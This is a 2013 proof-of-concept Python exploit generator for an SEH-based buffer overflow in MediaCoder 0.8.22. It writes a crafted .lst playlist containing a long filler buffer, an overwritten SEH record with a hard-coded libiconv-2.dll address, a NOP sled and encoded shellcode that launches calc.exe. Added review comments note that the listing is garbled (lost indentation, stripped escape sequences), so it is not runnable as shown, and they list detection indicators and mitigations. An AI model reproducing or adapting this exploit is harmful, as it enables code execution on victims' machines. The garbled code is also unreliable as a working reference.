# Title : Mediacoder (.lst) - SEH Buffer Overflow
# Published : 2013-06-24
# Author :
#!/usr/bin/python
import os
import sys
from struct import pack
from time import sleep
# Proof-of-concept file generator (Python 2: uses the `print` statement and
# raw_input). It writes a crafted playlist file, "All-MediaCoder.lst", which
# the advisory banner below says triggers an SEH-based buffer overflow in the
# listed MediaCoder 0.8.22 editions.
#
# NOTE(review): this listing appears to have been damaged in extraction. The
# block indentation is gone and the string literals read "x41", "x90",
# "nExploit file created!n" where escape sequences would be expected, so the
# text below is not valid Python and the strings are plain ASCII text as shown.
# Treat it as a record of the advisory, not as a runnable artifact.
#
# Defensive takeaways supported by this page:
#   * Affected builds are the ones named in the banner; the fixed version is
#     not stated here -- TODO confirm with the vendor before declaring a host
#     patched.
#   * The trigger is a .lst entry beginning with "http://" followed by a run
#     of 845 filler units, far longer than any legitimate playlist URL. A
#     single over-long line in a .lst file is a workable content indicator.
#   * The only test platform named is Windows XP Pro SP3, which predates
#     SEHOP. SEHOP, SafeSEH-built modules, DEP and ASLR are the standard
#     mitigations for this bug class.

# Cosmetic console setup only: clear the screen (and set colours on Windows).
if os.name == "nt":
os.system("cls")
os.system("color 3f")
else:
os.system("clear")
# Advisory banner: product list, file format, dates, finder and test platform.
print """
[+]Exploit Title: All Mediacoder Product SEH Buffer Overflow
[+]Download All Product: http://www.mediacoderhq.com/editions.html
[+]Vulnerable Product:!
[+]Mediacoder 0.8.22.5525
[+]Mediacoder Web Video Edition 0.8.22
[+]Mediacoder Handsets Edition 0.8.22
[+]Mediacoder iPhone Edition 0.8.22
[+]MediaCoder-PSP Edition 0.8.22
[+]Vulnerabilities File Format:lst
[+]Date (found): 21.06.2013
[+]Date (publish): 21.06.2013
[+]Founder: metacom
[+]RST
[+]Tested on: Windows Xp pro-sp3 English
"""
# File layout, in order: URL-scheme prefix plus filler, then the two fields
# named after the SEH record (nseh, seh), then padding, then the payload.
# The count 845 is the author's value; presumably it is specific to the
# tested build and platform -- confirm before relying on it as a signature.
buffer = "http://" + "x41" * 845
nseh = "xEBx06xFFxFF"
# Hard-coded little-endian 32-bit address. The author's comment attributes it
# to libiconv-2.dll; a fixed address like this presumably depends on that
# module loading at a predictable base without SafeSEH -- verify per build.
seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll
nops= "x90" * 80
# Per the author's generator comment below, the payload only launches
# calc.exe as visible proof of code execution, encoded to avoid the bytes
# listed after -b.
#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b 'x00x0ax0dx5c' -t c
shell= ("xbfx8exa0x35xacxdaxdaxd9x74x24xf4x5bx2bxc9xb1"
"x33x83xc3x04x31x7bx0ex03xf5xaexd7x59xf5x47x9e"
"xa2x05x98xc1x2bxe0xa9xd3x48x61x9bxe3x1bx27x10"
"x8fx4exd3xa3xfdx46xd4x04x4bxb1xdbx95x7dx7dxb7"
"x56x1fx01xc5x8axffx38x06xdfxfex7dx7ax10x52xd5"
"xf1x83x43x52x47x18x65xb4xccx20x1dxb1x12xd4x97"
"xb8x42x45xa3xf3x7axedxebx23x7bx22xe8x18x32x4f"
"xdbxebxc5x99x15x13xf4xe5xfax2ax39xe8x03x6axfd"
"x13x76x80xfexaex81x53x7dx75x07x46x25xfexbfxa2"
"xd4xd3x26x20xdax98x2dx6exfex1fxe1x04xfax94x04"
"xcbx8bxefx22xcfxd0xb4x4bx56xbcx1bx73x88x18xc3"
"xd1xc2x8ax10x63x89xc0xe7xe1xb7xadxe8xf9xb7x9d"
"x80xc8x3cx72xd6xd4x96x37x28x9fxbbx11xa1x46x2e"
"x20xacx78x84x66xc9xfax2dx16x2exe2x47x13x6axa4"
"xb4x69xe3x41xbbxdex04x40xd8x81x96x08x31x24x1f"
"xaax4d")
exploit = buffer + nseh + seh + nops + shell
# Write the assembled string to the output file, then pause for a keypress.
# NOTE(review): the file is opened in text mode ('w') and closed manually,
# and the bare `except` reduces every failure (I/O or otherwise) to the
# single word "Error", hiding the cause.
try:
rst= open("All-MediaCoder.lst",'w')
rst.write(exploit)
rst.close()
raw_input("nExploit file created!n")
except:
print "Error"